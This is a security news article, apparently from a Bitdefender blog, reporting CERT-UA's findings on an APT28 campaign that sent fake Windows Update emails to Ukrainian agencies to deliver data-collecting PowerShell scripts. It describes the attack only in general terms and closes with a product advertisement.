Russian Cyber Group APT28 Targets Ukraine Government with Fake Windows Update Emails

The APT28 group has been spotted spreading rogue emails to Ukrainian government agencies. The infamous Advanced Persistence Threat (APT) gang is leading a campaign to flood its targets with deceptive messages about Windows updates in a bid to spread data-stealing malware on compromised machines.

According to the Computer Emergency Response Team of Ukraine (CERT-UA), threat actors sent fake Windows Update emails throughout April, spoofing the email addresses of government agencies’ system administrators.

Upon further investigation, CERT-UA found malicious attachments hidden in the emails. When opening the attachments, the unsuspecting recipients would unleash malware into their systems.

The primary goal of the APT28 campaign is to infiltrate the targeted systems, steal sensitive data, and potentially disrupt the functioning of the Ukrainian government.

“The sample letter contains ’instructions‘ in Ukrainian for ’updates to protect against hacker attacks,’ as well as graphical images of the process of launching a command line and executing a PowerShell command,” reads CERT-UA’s security advisory. “The mentioned command will download a PowerShell script that, simulating the process of updating the operating system, will download and execute the following PowerShell script designed to collect basic information about the computer using the ‘tasklist,’ ‘systeminfo’ commands, and send the received results using HTTP request to the Mocky service API.”

APT28, also known as Sofacy, Strontium and Fancy Bear, is believed to have strong ties to the Kremlin. These connections suggest the Kremlin may support or even direct their cyber-espionage activities, further complicating the geopolitical landscape.

The current campaign is not a standalone event in the struggle between Russia and Ukraine. There have been multiple instances of cyber warfare involving both sides.

One notable recent event involved an anonymous hacker who managed to steal cryptocurrency from wallets owned by Russian agencies. The stolen funds were then redirected to Ukrainian aid wallets, providing financial support to the country amidst the prolonged war.

These occurrences emphasize how cyber warfare is becoming a vital component of international disputes, where government-backed operatives and individual hackers contribute significantly to such conflicts.

Specialized software like Bitdefender Ultimate Security can protect you from rogue emails and other cybernetic threats with its comprehensive list of features, including:

• 24-7, all-around monitoring and protection against worms, viruses, Trojans, rootkits, zero-day exploits, spyware, ransomware, and other e-threats
• Antispam module that filters irrelevant messages in your local email clients’ inbox
• Behavioral detection technology that closely monitors active apps and takes instant action upon detecting suspicious activity
• Network threat prevention module that identifies and blocks suspicious network-level activities, including botnet-related URLs, brute-force attacks, and sophisticated exploits